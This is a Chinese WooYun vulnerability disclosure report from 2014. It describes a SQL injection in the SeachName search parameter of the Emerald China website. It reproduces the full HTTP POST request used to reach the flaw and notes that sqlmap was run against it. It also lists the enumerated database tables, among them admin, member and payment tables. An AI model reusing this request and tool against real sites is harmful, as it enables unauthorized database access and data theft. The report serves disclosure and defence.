当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-056588

漏洞标题:Emerald中国存在sql注入漏洞

相关厂商:Emerald中国

漏洞作者: bitcoin

提交时间:2014-04-13 18:01

修复时间:2014-05-28 18:01

公开时间:2014-05-28 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Emerald中国存在sql注入漏洞,Emerald爱墨瑞得是世界一流管理学专业期刊和数据库出版社之一

详细说明:

注入页面:
www.emeraldinsight.com.cn
在本站搜索处,对参数SeachName过滤不严
抓包
POST /Seach.php HTTP/1.1
Host: www.emeraldinsight.com.cn
Proxy-Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Origin: http://www.emeraldinsight.com.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.emeraldinsight.com.cn/Seach.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=chjmil3nn73ne22m84ic95r314
SeachName=11&SelType=news
让sqlmap运行起来

1.jpg


sq_emera部分表如下:
| bee_alone |
| bee_article |
| bee_ask |
| bee_auto_fields |
| bee_block |
| bee_book |
| bee_book_info |
| bee_category |
| bee_channel |
| bee_cmsinfo |
| bee_collect |
| bee_down |
| bee_flash_ad |
| bee_flash_info |
| bee_form |
| bee_formfield |
| bee_formlist |
| bee_job |
| bee_keywords |
| bee_lang |
| bee_lang_cate |
| bee_lang_lang |
| bee_link |
| bee_maintb |
| bee_market |
| bee_member |
| bee_member_group |
| bee_prinfo |
| bee_product |
| bee_tpl |
| bee_uppics |
| books |
| call_for |
| category |
| conferences |
| dede_addonarticle |
| dede_addonimages |
| dede_addoninfos |
| dede_addonshop |
| dede_addonsoft |
| dede_addonspec |
| dede_admin |
| dede_admintype |
| dede_advancedsearch |
| dede_arcatt |
| dede_arccache |
| dede_archives |
| dede_arcmulti |
| dede_arcrank |
| dede_arctiny |
| dede_arctype |
| dede_area |
| dede_ask |
| dede_ask_scores |
| dede_askanswer |
| dede_asktype |
| dede_channeltype |
| dede_co_htmls |
| dede_co_mediaurls |
| dede_co_note |
| dede_co_onepage |
| dede_co_urls |
| dede_diyform1 |
| dede_diyforms |
| dede_dl_log |
| dede_downloads |
| dede_erradd |
| dede_feedback |
| dede_flink |
| dede_flinktype |
| dede_freelist |
| dede_group_guestbook |
| dede_group_notice |
| dede_group_posts |
| dede_group_smalltypes |
| dede_group_threads |
| dede_group_user |
| dede_groups |
| dede_guestbook |
| dede_homepageset |
| dede_keywords |
| dede_log |
| dede_mail_order |
| dede_mail_title |
| dede_mail_type |
| dede_member |
| dede_member_company |
| dede_member_feed |
| dede_member_flink |
| dede_member_friends |
| dede_member_group |
| dede_member_guestbook |
| dede_member_model |
| dede_member_msg |
| dede_member_operation |
| dede_member_person |
| dede_member_pms |
| dede_member_snsmsg |
| dede_member_space |
| dede_member_stow |
| dede_member_stowtype |
| dede_member_tj |
| dede_member_type |
| dede_member_vhistory |
| dede_moneycard_record |
| dede_moneycard_type |
| dede_mtypes |
| dede_multiserv_config |
| dede_myad |
| dede_myadtype |
| dede_mytag |
| dede_payment |
| dede_plus |
| dede_purview |
| dede_pwd_tmp |
| dede_ratings |
| dede_scores |
| dede_search_cache |
| dede_search_keywords |
| dede_sgpage |
| dede_shops_delivery |
| dede_shops_orders |
| dede_shops_products |
| dede_shops_userinfo |
| dede_softconfig |
| dede_sphinx |
| dede_stepselect |
| dede_store_groups |
| dede_sys_enum |
| dede_sys_module |
| dede_sys_set |
| dede_sys_task |
| dede_sysconfig |
| dede_tagindex |
| dede_taglist |
| dede_uploads |
| dede_verifies |
| dede_vote |
| dede_vote_member |
| dee_ad |
| dee_cart |
| dee_category |
| dee_category_desc |
| dee_channel_category |
| dee_channel_category_desc |
| dee_channel_content |
| dee_channel_content_desc |
| dee_company |
| dee_company_desc |
| dee_config |
| dee_contact |
| dee_country |
| dee_customer |
| dee_gallery |
| dee_home_meta |
| dee_inquiry |
| dee_inquiry_product |
| dee_keywords |
| dee_language |
| dee_link |
| dee_mail_templates |
| dee_product |
| dee_product_desc |
| dee_product_image |
| dee_sessions |
| dee_statistics |
| dee_tags |
| dee_user |
| espcms_admin_member |
| espcms_admin_powergroup |
| espcms_advert |
| espcms_advert_type |
| espcms_album_file |
| espcms_album_images |
| espcms_bbs |
| espcms_bbs_typelist |
| espcms_calling |
| espcms_city |
| espcms_config |
| espcms_document |
| espcms_document_album |
| espcms_document_attr |
| espcms_document_content |
| espcms_document_label |
| espcms_document_message |
| espcms_enquiry |
| espcms_enquiry_info |
| espcms_filename |
| espcms_form_attr |
| espcms_form_group |
| espcms_form_value |
| espcms_keylink |
| espcms_keylink_type |
| espcms_lng |
| espcms_lngpack |
| espcms_logs |
| espcms_mailinvite_list |
| espcms_mailinvite_type |
| espcms_mailsend |
| espcms_mailsend_log |
| espcms_member |
| espcms_member_attr |
| espcms_member_class |
| espcms_member_value |
| espcms_menubotton |
| espcms_menulink |
| espcms_model |
| espcms_model_att |
| espcms_order |
| espcms_order_info |
| espcms_order_pay |
| espcms_order_payreceipt |
| espcms_order_shipping |
| espcms_order_shipreceipt |
| espcms_skin |
| espcms_subjectlist |
| espcms_templates |
| espcms_typelist |
| huato_ad |
| huato_cart |
| huato_category |
| huato_category_desc |
| huato_channel_category |
| huato_channel_category_desc |
| huato_channel_content |
| huato_channel_content_desc |
| huato_company |
| huato_company_desc |
| huato_config |
| huato_contact |
| huato_country |
| huato_customer |
| huato_gallery |
| huato_home_meta |
| huato_inquiry |
| huato_inquiry_product |
| huato_keywords |
| huato_language |
| huato_link |
| huato_mail_templates |
| huato_product |
| huato_product_brand |
| huato_product_brand_desc |
| huato_product_desc |
| huato_product_image |
| huato_sessions |
| huato_static_url |
| huato_statistics |
| huato_tags |
| huato_user |
| journal_list |
| journals |
| journals_pl |
| messagesa |
| news |
| news_pl |
| nitc_ad |
| nitc_cart |
| nitc_category |
| nitc_category_desc |
| nitc_channel_category |
| nitc_channel_category_desc |
| nitc_channel_content |
| nitc_channel_content_desc |
| nitc_company |
| nitc_company_desc |
| nitc_config |
| nitc_contact |
| nitc_country |
| nitc_customer |
| nitc_gallery |
| nitc_home_meta |
| nitc_inquiry |
| nitc_inquiry_product |
| nitc_keywords |
| nitc_language |
| nitc_link |
| nitc_mail_templates |
| nitc_product |
| nitc_product_brand |
| nitc_product_brand_desc |
| nitc_product_desc |
| nitc_product_image |
| nitc_sessions |
| nitc_static_url |
| nitc_statistics |
| nitc_tags |
| nitc_user |
| subject_area |
| users |
| webpages |
+-----------------------------+

3.jpg


4.jpg


漏洞证明:

如上

修复方案:

过滤,有礼物不

版权声明:转载请注明来源 bitcoin@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝